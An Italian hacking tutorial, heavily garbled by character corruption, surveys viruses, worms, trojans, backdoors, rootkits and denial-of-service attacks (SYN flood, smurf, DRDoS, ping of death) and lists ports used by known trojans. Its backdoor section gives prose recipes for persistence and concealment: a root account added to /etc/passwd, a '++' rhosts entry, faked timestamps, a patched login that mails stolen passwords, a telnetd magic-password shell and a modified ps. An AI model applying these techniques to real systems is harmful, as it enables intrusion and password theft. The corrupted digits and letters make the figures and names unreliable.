funzioni sia su un 7! che su un !ellulare A B) %uello che * successo con !ross+ver , un
virus sviluppato per infettare tutte le macchine con =indo&s [P e palmari o cellulari sincronizzati
dotati di =indo&s @obile .
$ome funziona A
Si installa nel sistema =indo&s e si avvia ogni volta all)accensione del boot # attende , attende e
ancora attende , fin %uando non si stabilisce una connessione con un sistema doatato di
=indoBs !- o =indoBs 0obile e si installa nel sistema .
!e conseguenze sono ben prevedibili ( si installa sul sistema e inizia a cancellare dati .
Uortunatamente %uesto * un 7o! #7roof of !oncept$ , ossia un sistema creato in laboratorio .
@a chi lo sa , forse hanno dato l)idea a %ualche bastWWWo di creare un sistema del genere . @ah ,
staremo a vedere .
.ischio
1egli ultimi 2; anni i virus sono stati considerati come gli attacchi pi devastanti al
mondo . ,ncora oggi * cosG . Purtroppo * possibile trovare versioni di virus perfezionate
ogni giorno di pi , %uindi un team di programmatori di antivirus non riescono a
sostenere il peso . State attenti a %uello che aprite e soprattutto a %uello che ricevete.
#C$ =orm
!a caratteristica principale di un >orm * la possibilit di moltiplicarsi su sistemi collegati
fra di loro in modo assolutamente autonomo . /l &orm riesce a replicarsi e ad adottare un
sistema replicante , come ad esempio contattare una rubrica presente su un programma
di ricezione e invio mail , e formare il proprio sistema infettato , provocando %uindi un
effetto domino difficile da arrestare . /nfatti , pur disinfettando un sistema , altri ::: su 4;;;
avranno lo stesso , enorme , problema creato precedentemente .
,lcuni di voi avranno gi sentito parlare di @>Doom # in pratica %uesto &orm riesce ad aprire una
porta del client , creando %uindi una sorta di strada per l)utilizzo di una bac-door , utilizzata poi
per creare una botnet . 1on preoccupatevi se non avete capito %uesti due termini , verranno
presentati dopo .
ual * la cosa che lo differenzia da un Firus A !a possibilit di funzionare non avendo bisogno di
un sistema che lo appoggi , per %uesto * utilizzato per effettuare infezioni di massa .
Possiamo essere attaccati da un &orm direttamente o indirettamente . 1el primo caso potremmo
essere le vittime stesse di un)infezione da &orm , ad esempio essere a rischio di far parte di una
botnet . 1el caso in cui fossimo nel secondo caso anche un nostro contatto in rubrica potrebbe
essere vittima di un &orm , %uindi rischiamo di essere bombardati di informazioni , %uali mail ,
inviti e %uant)altro che mirano solo ed esclusivamente allo spam .
$osa possiamo subito dedurre A Eeh , il fatto che un Borm pu girare su qualunque sistema
, in %uanto come scopo principale non ha alterare i file di sistema , ma semplicemente
interferiscono con il funzionamento del sistema sovraccaricando il lavoro dedicato alla macchina ,
fino a renderlo completamente inutilizzabile , o comun%ue infettando il maggior numero di file
possibili , lavorando Calla ciecaD .
?n altro fattore molto importante da ricordare * che di solito un &orm viene solo come diversivo (
mentre si * la caccia del &orm %uest)ultimo avr gi installato nel vostro sistema un bac-door o
un -e>gen in grado di controllarvi a distanza . Hcchio %uindi M
.ischio
Stesso identico problema dei virus . /l &orm * una minaccia che miete vittime ogni
giorno . ?na scarsa protezione vi rende ancor pi visibili a un &orm . !)unico consiglio
che vi posso dare * di evitare assolutamente messaggi estranei , un buon antivirus e
evitare programmi superflui .
#D$ Tro3an
Proprio come i greci si nascosero dentro un cavallo di legno per poi attaccare il cuore
della citt di Iroia , il IroVan attacca il nostro sistema esponendosi al sistema e all)utente
come un soft&are utile al nostro scopo (esempio Programma per inviare S@S Kratis"
contenendo per+ codice nocivo in grado di compromettere l)intero sistema . ?n antivirus
scrauso difficilmente riconoscer l)infezione , mentre per unire due semplici programmi
solitamente il lamer della situazione si arma di un binder o merge e compie il suo sporco lavoro .
/l troVan si espande tramite allegato posta elettronica , messaggistica istantanea e in tutti i %uei
casi dove la vittima * CcostrettaD ad eseguire il file infetto . /l troVan * specialmente utilizzato per
iniziare la riproduzione di un &orm o durante l)infezione del computer vittima
tramite Eac-door .
$ol passare dei tempi il IroVan ha assunto una forma %uasi perfetta ( viene
distribuito alle vittime sotto forma di eseguibili in grado di crac-are videogiochi
(esempio crac- o -e>gen" e riesce a nascondersi al sistema utilizzando varie
tecniche , tra cui c)* la rinominata 'oot-it .
!o scopo A uello di nascondere file incriminati dentro un eseguibile facendo in modo che non
venga riconosciuto da un sistema di protezione . /l risultato di tutto ci+ pu+ portare poi a varie
conseguenze ( far parte di una botnet o essere infettati da un bac-door .
.ischio
Difficilmente il vostro antivirus non si accorger se un eseguibile * effettivamente un
troVan , specie se viene creato tramite programmi presenti su /nternet . ?n bravo
programmatore invece potrebbe eludere la difesa , ma * comun%ue raro imbattersi in
situazioni del genere . /l rischio risulta invece enorme per i gestori di importanti aziende
e/o portali . $ercheranno in %ualun%ue modo di fregarvi .
#A$ Bac(door
,bbiamo parlato di bac-door fin)ora , ma dando sempre una forma superficiale su %uesto
sistema.
Dun%ue , un bac-door * un programma , * scritto in diversi linguaggi e ha la funzione principale
di superare le difese imposte da un sistema , come un fire&all , al fine di accedere in remoto e
prenderne il completo o il parziale possesso # solitamente * diviso in due parti( lato <lient e lato
Server .
<ome supera le difese 8
/l compito * %uello di sfruttare una porta utilizzata per connessioni remote , utilizzate
talvolta dagli stessi amministratori di rete per facilitare e velocizzare il processo di manutenzione
del sistema .
Le 5ackdoor vengono utilizzate per infiltrarsi in un sistema 8
Spesso le bac-door ha un altro ruolo , ossia di rimanere come una cimice nel sistema , utilizzato
%uindi dal $/H per accedervi in un secondo momento nascondendosi all)occhio indiscreto
dell)admin .
Fediamo ora come crearsi una bac-door , ovviamente il tutto * da ritenersi a scopo informativo
e/o educativo.
Bac(door /etc/passBd/
Per chi mastica pane e pinguini avr gi capito che %uesto * il percorso principale sui sistemi
?niJ dove sono salvate tutte le configurazioni dedicate alla gestione degli account presenti nel
sistema .
, prima vista %uesta frase potrebbe farvi pensare che , se accedete nella cartella , avete tutto il
database degli utenti sottomano . Purtroppo , anzi , per fortuna , nei nuovi sistemi ?niJ le
pass&ord sono CshadateD , mentre nei vecchi sistemi sono visualizzabili in chiaro .
<osa vuol dire pass6ord CshadateD 8
Fuol dire che utilizzano un sistema di criptazione che le permettono di nascondersi sotto forma di
codice illegibile all)occhio e alla mente umana . Iali pass&ord sono nascoste nella cartella
7etc7shado67 .
Fediamo ora come si presentano le righe di /etc/pass&d/ (
"istemi 6niE
?sername(Pass&ord(?ser/D(Kroup/D(/nfo(HomeDirector>(Sh
ell
6sername ( 1ome dell)utente per effettuare il login .
7assBord ( Pass&ord dell)utente . Pu+ essere scritta direttamente in forma criptata oppure
contenente una [ , %uindi la pass&ord risiede in /etc/shado&/ . 1el caso in cui c)* un W vuol dire
che il seguente utente ha una pass&ord non decifrabile o corrotta , pertanto il login con tale
utente non potr avvenire .
6ser)> ( /D dell)user .
?roup)> ( /D del gruppo di appartenenza .
)nfo ( $ontiene delle informazioni eJtra sull)utente , che non sono fondamentali per il
funzionamento del sistema .
9ome>irector% ( !a director> principale dell)utente
"hell ( la shell utilizzata dall)utente .
Uino a %ualche mesetto fa era possibile procurarsi un account amministratore semplicemente
creandolo ( nel etc/pass&d bastava andare nel uid/gid/ e impostare il valore ; , %uindi inserire i
vari valori presentati sopra .
Bac(door rhosts
?n)altra tecnica , sempre sotto sistemi ?nWJ , consiste nello sfruttare i sistemi rhosts o meglio
conosciuti come rsh e/o rlogin . /l seguente servizio permette di lavorare sulle macchine elencate
nell)rhosts senza conoscerne la pass&ord .
Se poi * necessario loggare nuovamente da tale servizio tramite altri sistemi remoti , sar
necessario eseguire una semplicissima operazione , ossia aggiungere nella riga del suddetto file
la stringa C\\D (senza i doppi apici" . B) un sistema tra l)altro molto sicuro , in %uanto i log delle
azioni vengono salvate in una locazione a parte non ben gestita e continuamente aggiornata dati
i continui afflussi di sfruttamenti di tale servizio .
Bac(door sul controllo della dimensione di un file
Uin)ora abbiamo un po) smembrato ogni singola azione che avrebbe potuto fare %ualsiasi persona
. Hra andiamo a vedere %ualcosa di leggermente complesso , precisamente andremo ad
analizzare il chec-sum e il timestamp che vengono utilizzati dall)amministratore durante la
gestione del sistema per verificare l)integrit di un file nel caso in cui sia infettato da %ualsiasi
script mal&are .
!)H/$ che si trova davanti %uesta situazione andr a modificare l)ora di sistema portandola
indietro , %uindi imposter l)orario della bac-door all)ora attuale ( perch* %uesto A /l
ragionamento * semplice ( i tools andranno a controllare i file da %uando * stato creato il sistema
fino all)ora attuale di sistema . /n parole povere , i tool non leggono il futuro M
Firtualizziamo ora un attacco di %uesto genere (
Oggi mi sento hacker (lol) 4 >e E ho preso possesso di una catena di *; server E ora vorrei proprio
ficcarci una 5ackdoor e E appena torno dalla serata con gli amici E mi faccio un 5ackup totale )
Fffi ora ho giusto il tempo per infilare una 5ackdoor )
"un-ue E apro il file login)c E cosG -uando -ualche pollo fa il login posso confrontare la pass6ord
immessa con lHhash presente in 7etc7shado67 e E se tutto va a 5uon fine E mi fotto le pass6ord E le
critto E e me le mando tramite mail alla mia casella di posta ) %spettiamo e speriamo 4
?na storiella inventata al momento , ma sicuramente gi applicata . $ome altro esempio di uso
comune di una bac-door * possibile effettuare %uesti procedimenti ( il protocollo utilizzato sar il
Ielnet che , durante una connessione a un altro superserver , inetd dovr passare tramite il
demone telnetd che sar infettato dalla bac-door , pi precisamente nell)[term o FI4;; , mentre
se verr specificato CletmeinD verr restituita una shell senza permessi di autenticazione . B)
possibile utilizzare anche lo schedular $ron che permette di ricevere la shell con permessi root da
un tempo prestabilito , nel caso in cui mangiassimo la pizza con i nostri amici (ehehM" riceveremo
la shell dopo la serata , %uindi se specifichiamo dalle 5 alle 6 di mattina , ci sar possibile
utilizzarla solo in %uell)orario .
Bac(door sulle librerie condivise
uesto tipo di Eac-door * considerato come un IroVan , anche se effettivamente il suo utilizzo
primario * %uello di eludere il controllo della chec-sum @D6 . Difatti , nei sistemi ?niJ, le librerie
condivise sono utilizzare per velocizzare l)esecuzione di script e programmi e di diminuirne
sostanzialmente il peso .
Da %ui crescono molti tipi di attacchi , tra i %uali sar possibile sostituire la funzione cr>pt("
presente nel sistema per ottenere i dati di login . Si potrebbe usare un altro trucchetto ( *
possibile nascondere il bac-door nel files>stem presente nel bootdis- dedicato al booting del
sistema ?nWJ # perch* %uesto A Perch* , a differenza di =indo&s che * affetto da tantissimi virus
e %uindi anche da tanti tools di protezione ,un sistema ?nWJ ha ben altri problemi che di
incappare negli stessi errori dei prodotti @icrosoft , %uindi tale situazione * da considerarsi
inevitabile in tutti i suoi aspetti M
Bac(door sui processi in stato di running
?na bac-door installata su un sistema crac-ato e %uella della modifica del comando ps che lista i
processi , la modifica del codice di %uesto programma infatti potrebbe nascondere vari processi
che possono sembrare CstraniD agli occhi di un %ualun%ue amministratore di sistema, oppure
cambiare nomi dei processi in modo da farli corrispondere ai normali demoni esempio S>slog
Nerneld etc., un)altra bac-door pi sofisticata per nascondere i processi * %uella di guidare la
routine degli interrupt per fare in modo che il sistema non riconosca il sistema tra %uelli attivi .
Bac(door per connessioni che utilizzano protocolli T!7/)7
Uin)ora abbiamo parlato di come inserire una bac-door , dove inserirla , cosa farci e come
recuperare username e pass&ord degli admin . 1el :;] dei casi gli admin cercano di loggare
tutto %uello che succede nei protocolli I$P//P essendo di norma il protocollo pi utilizzato ,
trascurando cosG protocolli come ?DP , S@IP , PHP3 ecc ... molti fire&all infatti non filtrano i
pacchetti /$@P che offrono dei servizi come il D1S dando %uindi la possibilit a un H/$ di ricevere
una shell tramite una bac-door che b>passa la difesa del fire&all . $i sono poi delle bac-door che
sfruttano il servizio di ping , utile per verificare se una macchina in rete * attiva o meno #
solitamente su un server che pu+ ricevere pacchetti ping in entrata , l)amministratore pu+
leggere il contenuto dei pacchetti , a patto che lui ne voglia . ?n H/$ pu+ addirittura crittografare
i pacchetti , cosG da renderne pi difficile l)identificazione Diciamo che pi che una bac-door
%uesto * un modo per non farsi rintracciare dall)amministratore del server che volete rintracciare
.
Lista di porte eEploitabili da bac(door conosciute
port 24 < Eac- $onstruction, Elade 'unner, Dol> IroVan, Uore, UIP troVan, /nvisible UIP, !arva,=ebBJ, =in$rash
port 23 < Iin> Ielnet Server (S IIS"
port 26 < ,Van, ,ntigen, Bmail Pass&ord Sender, Haebu $oceda (S 1aebi", Happ> ::, Nuang2,Pro@ail troVan, Shtrilitz,
Stealth, Iapiras, Ierminator,=inP$, =inSp>
port 34 < ,gent 34, Hac-ers Paradise, @asters Paradise
port 54 < DeepIhroat
port 6: < D@Setup
port 8: < Uirehotc-er
port 9; < BJecutor, 'ing^ero
port :: < Hidden Port
port 44; < Pro@ail troVan
port 443 < Nazimas
port 44: < Happ> ::
port 424 < _ammerNillah
port 524 < I$P =rappers
port 567 < Hac-ers Paradise
port 634 < 'asmin
port 666 < /ni<Niller, 1eI,dmin, Phase ^ero, Stealth Sp>
port 777 < ,ttac- UIP, Eac- $onstruction, $ain Z ,bel, Satanz Eac-door,
Serve?, Shado& Ph>re
port :44 < Dar- Shado&
port ::: < DeepIhroat, =inSatan
port 4;;4 < Silencer, =ebBJ
port 4;4; < Dol> IroVan
port 4;44 < Dol> IroVan
port 4;42 < Dol> IroVan
port 4;46 < Dol> IroVan
port 4;25 < 1etSp>
port 4;52 < Ela
port 4;56 < 'asmin
port 4;:; < [treme
port 448; < Ps>ber Stream Server, Streaming ,udio troVan, Foice
port 4235 < ?ltors IroVan
port 4253 < Eac-Door<K, SubSeven, SubSeven ,pocal>pse
port 4256 < FooDoo Doll
port 427: < @averic-s @atriJ
port 435: (?DP" < EH D!!
port 45:2 < UIP::$@P
port 46;: < Ps>ber Streaming Server
port 47;; < Shiv-a<Eur-a
port 49;8 < Sp>Sender
port 4:94 < Shoc-rave
port 4::: < Eac-Door
port 4::: < IransScout
port 2;;; < IransScout
port 2;;4 < IransScout
port 2;;4 < IroVan $o&
port 2;;2 < IransScout
port 2;;3 < IransScout
port 2;;5 < IransScout
port 2;;6 < IransScout
port 2;23 < 'ipper
port 2446 < Eugs
port 245; < Deep Ihroat, Ihe /nvasor
port 2466 < /llusion @ailer
port 2293 < HF! 'at6
port 2676 < Stri-er
port 2693 < =in$rash
port 27;; < Digital 'ootEeer
port 29;4 < Phineas Phuc-er
port 2:9: (?DP" < ',I
port 3;25 < =in$rash
port 3429 < 'ing^ero
port 342: < @asters Paradise
port 346; < Deep Ihroat, Ihe /nvasor
port 356: < Bclipse 2;;;
port 38;; < Portal of Doom
port 38:4 < Bcl>pse
port 39;4 (?DP" < Bcl>pse
port 5;:2 < =in$rash
port 5324 < EoEo
port 5678 < Uile 1ail
port 56:; < /$IroVan
port 6;;; < Eubbel, Eac- Door Setup, Soc-ets de Iroie
port 6;;4 < Eac- Door Setup, Soc-ets de Iroie
port 6;44 < Hne of the !ast IroVans (HHI!I"
port 6;34 < 1et@etro
port 6324 < Uirehotc-er
port 65;; < Elade 'unner, Eac- $onstruction
port 65;4 < Elade 'unner, Eac- $onstruction
port 65;2 < Elade 'unner, Eac- $onstruction
port 666; < [tcp
port 6642 < /llusion @ailer
port 6666 < Serve@e
port 6667 < EH Uacil
port 6668 < EH Uacil
port 667: < 'obo<Hac-
port 6852 < =in$rash
port 75;; < Ihe Ihing
port 777: < Famp>re
port 778; < DeepIhroat
port 7884 < DeepIhroat
port 7887 < Eac-Door<K, SubSeven
port 7:42 < Shit Heep (not port 7:423M"
port 7:3: < /ndoctrination
port 7:7: < Kate$rasher, Priorit>, /'$ 3
port 7:8; < Kate$rasher
port 8;;; < 'emote Krab, Nazimas
port 83;; < 1et@onitor
port 83;4 < 1et@onitor
port 83;7 < 1et@onitor
port 83;8 < 1et@onitor
port 83;9 < 1et@onitor
port 889: < Eac- Door Setup, /$Niller
port 9;9; < 'ing^ero
port :5;; < /n$ommand
port :982 < Portal of Doom
port :983 < Portal of Doom
port :985 < Portal of Doom
port :986 < Portal of Doom
port :987 < $>ber ,ttac-er
port :989 < IransScout
port ::9: < i1i<Niller
port 4;;78 (?DP" < Portal of Doom
port 4;4;4 < ErainSp>
port 4;478 (?DP" < Portal of Doom
port 4;62; < ,cid Shivers
port 4;7;8 < $oma
port 44;;; < Senna Sp>
port 44223 < Progenic troVan
port 42;87 < KVamer
port 42223 < Hac-T:: Ne>!ogger
port 42356 < KabanEus, 1etEus, Pie Eill Kates, [<bill
port 42357 < KabanEus, 1etEus, [<bill
port 42374 < =hac-<a<mole
port 42372 < =hac-<a<mole
port 42734 < =hac-_ob
port 43;;; < Senna Sp>
port 47:7: < Priorit>
port 483;; < Nuang2 Ihe Firus
port 2;;;; < @illennium
port 2;;;4 < @illennium
port 2;;35 < 1etEus 2 Pro
port 2;2;3 < !ogged
port 24655 < KirlUriend
port 22222 < Prosia-
port 23567 < Bvil UIP, ?gl> UIP, =hac- _ob
port 23587 < Donald Dic-
port 23588 < Donald Dic-
port 27285 (?DP" < Delta Source
port 2:9:4 (?DP" < Ihe ?neJplained
port 3;;2: < ,H! IroVan
port 3;4;; < 1etSphere
port 3;4;4 < 1etSphere
port 3;4;2 < 1etSphere
port 3;3;3 < Soc-ets de Iroi
port 3;::: < Nuang2
port 34337 < Eo =hac-
port 34338 < Earon 1ight, EH client, EH2, Eo Uacil
port 34338 (?DP" < Eac-Uire, Eac- Hrifice, DeepEH
port 34339 < 1etSp> DN
port 34339 (?DP" < Eac- Hrifice, DeepEH
port 3433: < 1etSp> DN
port 34777 < EH=hac-
port 34896 < Hac-TaTIac-
port 34898 < Hac-TaTIac-
port 34899 < Hac-TaTIac-
port 3489: (?DP" < Hac-TaTIac-
port 348:4 (?DP" < Hac-TaTIac-
port 348:2 < Hac-TaTIac-
port 33333 < Prosia-
port 33:44 < Spirit 2;;4a
port 35325 < EigKluc-, I1
port 5;542 < Ihe Sp>
port 5;524 < ,gent 5;524, @asters Paradise
port 5;522 < @asters Paradise
port 5;523 < @asters Paradise
port 5;527 < @asters Paradise
port 58272 (?DP" < Delta Source
port 6;6;6 < Soc-ets de Iroie
port 6;877 < Uore, Sch&indler
port 63;;4 < 'emote =indo&s Shutdo&n
port 6532; < Eac- Hrifice 2;;;
port 65324 < School Eus
port 65324 (?DP" < Eac- Hrifice 2;;;
port 7;;;; < Deep Ihroat
port 74577 < Ielecommando
port 76;;; < Devil
.ischio
B) grave assai essere infettati da un bac-door . Solitamente ci se la cava con un antivirus
(cosa che pochissimi usano" e talvolta neanche basta , in %uanto la bac-door potrebbe
essere scritta dall)attac-er stesso . State attenti a %uello che vi danno . B a volte non
basta %uesto consiglio .
#@$ .oot(it
/l rootkit * una specie di mutazione del troIan , esso infatti nasconde al suo interno un codice
mal&are in grado di poter prendere possesso delle informazioni del computer vittima , %uindi
inviarle a un computer madre dove saranno poi salvate in un database e riutilizzate in futuro
(pensate se siete vittime di un root-it e avete le pass&ord pa>pal sul vostro computer" .
, differenza dei IroVan (che girano per la maggior parte sui sistemi =indo&s" il root-it riesce a
infettare il sistema usando il kernel principale o alcune li5rerie esterne .
uando nasce il root-it A B) difficile saperlo ... diciamo per+ che il primo CteamD che ha infettato
milioni di macchine in tutto il mondo * stata la Son> . 1on ci crederete , non ci credevo nemmeno
io , ma facendolo sapere in una piccola nota in basso sul retro della copertina di ogni cd avvisava
i clienti che sarebbero stati spiati dalla Son> proprio per vedere %uali erano i prodotti che pi
interessavano al cliente . /nsomma , che cattivoni %uesti della Son> .
Uortunatamente nel corso degli anni il root-it si sta leggermente indebolendo , considerando il
fatto che * comun%ue un processo lungo , specie nel momento di programmarlo , inoltre con
l)arrivo di sistemi antiroot-it oramai sembra che l)era di %uesto sistema avr poco tempo .
Bcco ora una lista di alcuni root-it trovati nel 2;;8 (presenti sul sito &&&.antiroot-it.com"
IroV/'usDrp</ =indo&s 47<_an<2;;8 =in32/'ustoc-
IroV/'usto-<1 =indo&s 47<_an<2;;8 =in32/'ustoc-.1EU
IroV/'usto-<@ =indo&s 47<_an<2;;8 IroVan<$lic-er.=in32.$ostrat.s
=32.Salit>.[ =indo&s 42<_an<2;;8
IroV/'N'usto-<N =indo&s 42<_an<2;;8 Eac-door.'ustoc-.E
IroV/@ailbot<EK =indo&s 42<_an<2;;8 IroVan.=in32.,gent.aai
IroV/HaJdoor<D@ =indo&s 44<_an<2;;8
IroV/^lob<[^ =indo&s 4;<_an<2;;8
Eac-door.HaJdoor.S =indo&s ;:<_an<2;;8
IroV/1I'ootN<E$ =indo&s ;:<_an<2;;8
IroV/1ailuV<, =indo&s ;:<_an<2;;8
IroV/@ailbot<EU =indo&s ;9<_an<2;;8 Spam<@ailbot.c
IroV/HaJdoor<D! =indo&s ;9<_an<2;;8 Eac-door.=in32.HaJdoor.V&
END'YhaJdoor.-g =indo&s ;8<_an<2;;8
=32.Sp>bot.,1__ =indo&s ;6<_an<2;;8
IroV/^lob<[? =indo&s ;5<_an<2;;8
IroV/!ager<? =indo&s ;5<_an<2;;8
=32/Piggi<, =indo&s ;3<_an<2;;8
IroV/1I'ootN<EE =indo&s ;3<_an<2;;8
IroV/'N'usto-<! =indo&s ;2<_an<2;;8 I'H_Y$HSI',I.,/
1iente panico , ci si pu+ difendere . /o personalmente uso root-it unhoo-er . ,ttualmente lo
ritengo il migliore , in primo luogo perch* * potente e molto leggero , secondo perchL * free . Se
poi siete dei paranoici della sicurezza potete procurarvi sistemi leggermente pi sofisticati
sviluppati da team soft&are come ,FK , Panda ecc ...
.ischio
!e macchine infettate sono ancora tantissime nel mondo . !)unico problema * che la
soluzione c)* , ma non si conosce ( facendo una piccola ricerca su %ualsiasi motore di
ricerca infatti sar possibile trovare moltissimi soft&are di rimozione dei root-it . ,rmatevi
di uno di %uesti se gi non l)avete fatto.
#,F$ >enial of "ervice #>o"$
$redo sia l)immagine pi azzeccata tra tutte . /l Denial of Service (in /taliano 1egazione di
Servizio" * un)attacco che mira a portare al massimo delle prestazioni un servizio , esempio Sito
=eb (porta 9; default" fino a farlo collassare e a far si che %uesto non possa essere pi
adoperato .
/l problema principale nello subire un attacco DoS sta nel fatto che , pur limitando la banda in
entrata di un servizio per ogni utente , purtroppo sono state perfezionate alcune tecniche in
modo da eludere %uesto controllo . Fediamo ora %uali sono gli attacchi pi utilizzati .
Kli attacchi DoS si possono suddividere in due tipi ( attacco derivante da un host o attacco
derivante da una rete host .
/l primo * facilmente rintracciabile , in %uanto la richiesta della negazione di servizio viene
attuata da un solo computer (il computer che appunto produce l)attacco".
$osa provaca un attacco DoS A
Saturazione di banda , calcolo abbondante della $P? e riempimento dei file di log # %uindi si parla
di impossibilit di utilizzare il servizio , sovraccarico di lavoro della $P? (%uindi lentezza dei lavori
con il rischio di bruciare il componente" e riempimento dell)hard dis- . /nsomma , un lavoraccio
poi per l)admin a rinsanare il server .
"%n</lood
B) stato il primissimo attacco DoS , forse il pi banale ma anche %uello che ha riscosso pi
successo , data la sua semplicit . $ome si pu+ capire benissimo anche dal nome , l)attacco
prevede di inondare un sistema con pacchetti di tipo S>n . Bsempio ( navighiamo su un sito &eb ,
troviamo un lin- del tipo &&&.sito.it/do&nload.htm # il server che hosta il servizio &eb dovr
richiedere una connessione I$P al client , che consiste nell)effettuare una serie di passi , tra cui
spunta l)invio di un pacchetto I$P .
@a vediamo attentamente i passaggi di una connessione $lient<Server per visualizzare una
pagina &eb (
4"/l client invia al server un messaggio S`1 (sBnchronize" richiedendo la connessione.
2"/l server ackno6ledges invier un S`1<,$N , ossia un messaggio di risposta.
3"/l server invier il pacchetto ,$N (pacchetto di risposta" e la connessione col client verr
eseguita .
, %uesto punto l)attacco vien da sL ( programmare un sistema (o programma , come vogliate voi"
in grado di poter effettuare migliaia di connessioni al secondo fino a far arrestare il sistema .
!)unico grande , anzi immenso , problema sta nel fatto che le connessioni (almeno in /talia" sono
molto lente # a meno che voi non attacchiate a una centrale Ielecom con connessione diretta a
2;mega sar difficile effettuare un S>n<Ulood a un server . Pensate che alcuni hoster hanno
server a fibra ottica , in una stanza anti<terremoto , antiproiettile a 5 -m sotto terra .
G< -sempio di normale richiesta
-sempio di attacco "%n</lood <H
.ischio
Preoccuparsi A Per cosa A uesto * un attacco superato , le connessioni moderne riescono
a mantenere la linea senza perdere troppa efficacia anche durante un attacco di massa
S>n<Ulood .
Se siete particolarmente preoccupati , basta semplicemente limitare la banda al router .
"murf
, differenza del S>n<Ulood , l)attacco Smurf pu+ partire anche da una connessione dial<up , anche
se * preferita una connessione pi veloce , dove la connessione funge da moltiplicatore di
pacchetti , fino ad arrivare al computer vittima ad un)impressionante velocit di connessione .
1ella sua struttura , un attacco Smurf consiste nell)inviare pacchetti di broadcast (una rete
broadcast * tipo il segnale radio , %uando il numero di connessioni non * definita" verso una rete
gestita da un router dove ci sono gravi errori di configurazione ad internet # in risultato sar
CordinareD agli host di smurfare il server indicatogli , tramite il comando P/1K .
&erchJ viene effettuato lHattacco Smurf8
!)attacco DoS "murf, a differenza di altri generi di Denial of Service, ha come fine la saturazione
della banda assegnata all)/P di destinazione, al fine di impedire il raggiungimento dei servizi
offerti
da tale host, da una connessione richiedente esterna. /n certi casi, %uesto tipo di disservizio, pu+
essere problematico a livello economico (es. portali conosciuti %uali `ahoo, Bba> ecc..".
.ischio
=indo&s [P SP2 non permette di fare smurf , ma i vecchi sistemi si . uesto per+ * gi
%ualcosa , considerando poi esistono siti che testano se un computer * vulnerabile allo
smurf # l)attacco * ancora efficace , ma limitando la banda sulla connessione sarete
immuni a %uesto attacco.
Seguiamo ora gli attacchi derivanti da piK host . !)attacco viene effettuato da pi sistemi ,
rendendo poi pi difficoltoso l)attaccante .
>>o"
"istri5uted #eflection "enial of Service ("#"oS) * un attacco che mira all)attacco DDoS
utilizzando pi macchine contemporaneamente . Spieghiamolo brevemente ( il computer
dell)attaccante fa tante richieste ad altrettanti server (con connessioni pi veloci" dando come
mittente l)ip del computer vittima . Sappiamo che la risposta ,$N e l)effettiva connessione
verranno %uindi instaurati con il mittente . Bcco dun%ue che succede (
4"!)attaccante invia una richiesta di connessione a tanti server che , come mittente , verr dato
l)ip della vittima
2"/ Server riceveranno la richiesta e invieranno la risposta della connessione .
3"/ Server si connetteranno al computer vittima inviando migliaia di pacchetti S`1<,$N .
Hvviamente non tutti i server possono essere utilizzati per fare un attacco DDoS , infatti si ha
bisogno di avere una botnet (prima o poi ve la spiegher+ %uesta cosa" e di una buona lista di
zombie che ne fanno parte .
@entre nello smurf risulta pi difficile che venga creato un attacco a buon fine , nel DDoS la cosa
* ben diversa ( infatti i computer hanno una connessione sempre pi veloce , che pu+ essere
utilizzata per attaccare il computer vittima in maniera pi efficace e in minor tempo .
Prefazione dell)attacco
!)attacco , prima di dover essere eseguito , dev)essere preparato . Si ha bisogno di uno zom5ie ,
ossia di un computer vittima infettato spesso da un 6orm o virus che andr %uindi ad aprire una
porta sfruttabile da un 5ackdoor .
?na serie di computer infetti , o zombie , fanno parte di una serie di computer manipolati dallo
stesso attaccante ( la famigerata botnet . 1e riparleremo pi avanti , ma comun%ue mi
sembrava doveroso accennarlo visto che ne abbiamo parlato tanto , ma si sa ben poco .
.ischio
Se siete sotto una botnet siete nei guai ( gli attacchi verranno effettuati dal vostro
computer e sar difficile dichiarare che la fonte era esterna . Se siete attaccati da una
botnet fate la fine di una bottiglia riempita da una fontana . Prima o poi straripate .
>.>o"
Distributed 'eflection Denial of Service
Kli umani mi sorprendono . Kli hac-er ancora di pi .
uesto attacco * un po) come lo scacco matto # pensi tanto a come muoverti %uando invece
l)avversario ti frega con una mossa stupidissima . !a domanda mi * ovvia ( perch* utilizzare tanti
computer per crashare un server %uando basta un server per crashare un computer A
!a risposta * D'DoS . Uacciamo la solita richiesta al server , come obiettivo di risposta gli diamo il
nostro /P e lui ci risponder tante volte %uante richieste abbiamo fatto . Hra proviamo a sostituire
Cil nostro /PD con Cl)/P della vittimaD e , come per magilla , la risposta del server verr effettuata
verso la macchina con cui noi ci siamo identificati . Semplice no A
!e due facce ( da una parte la maggior parte dei server filtrano %uesti tipi di attacchi , %uindi
resta difficile che si possa trovare un server disponibile a %uesto tipo di attacco . B %uesto * bene
. /l male invece lo fa la @icrosoft ( se pensassero a fare sistemi operativi migliori invece che
inventarsi dei protocolli e rendere disponibili a tutti i lamer le 'a& Soc-ets , il mondo sarebbe
migliore .
/nfatti tramite un Sistema Hperativo @icroRoft * possibile modificare le 'a& Soc-ets in modo che
l)invio della risposta venga fatto a un %ualsiasi /P .
.ischio
Dare un voto di rischio * davvero difficile ( il filtraggio dei server * ottimo e %uasi tutti lo
applicano , %uindi abbassano al minimo il rischio . Poi c)* la @icroRoft che fa di testa sua ,
e porta le sue 'a& Soc-et a fare del male . 'ischio medio , e%uilibrio che da una goccia
pu+ far rovesciare il vaso .
Parliamo ora di attacchi di tipo DoS che possono essere effettuati sia a connessione singola che a
connessione multipla .
7ing of >eath
49 Dicembre 4::7 ( pi di dieci anni fa , fu emesso un bollettino dove venne spiegato che tutti i
sistemi informatici erano affetti da una vulnerabilit dove una richiesta di tipo /$@P B$HH
effettuata con il comando CpingD potesse provocare il malfunzionamento e il blocco totale della
macchina vittima .
/n particolare il pacchetto che veniva inviato superava il limite di peso consentito , i CpesantiD
75- .
, cosa serve il comando P/1K A
/l ping viene utilizzato per controllare se una macchina remota * attiva o meno . Possiamo fare un
esempio di ping accedendo al telnet (per =indo&s ( Bsegui<Ocmd<OIelnet" e digitare (
Ping &&&.%ualsiasisito.it
!a macchina remota , se attiva , risponder con una cosa tipo
'isposta da JJJ.JJ.JJJ.J b>teS.................
,ltrimenti riceveremo
'ichiesta scaduta
@a torniamo all)attacco PHD ( la grandezza massima di un pacchetto * di 76637 b>tes . !)attacco
, inoltre , pu+ essere effettuato su %ualsiasi macchina presente in rete (periferiche esterne ,
stampanti , router" l)importante * che siano connesse direttamente alla rete .
1umero 76637 ( su %uesti 2; b>tes vengono utilizzati per l)intestazione del pacchetto , mentre
altri 9 b>tes vengono mantenuti per gli header del pacchetto . uindi i dati residenti nel
pacchetto saranno (
76637<2;<9S766;8
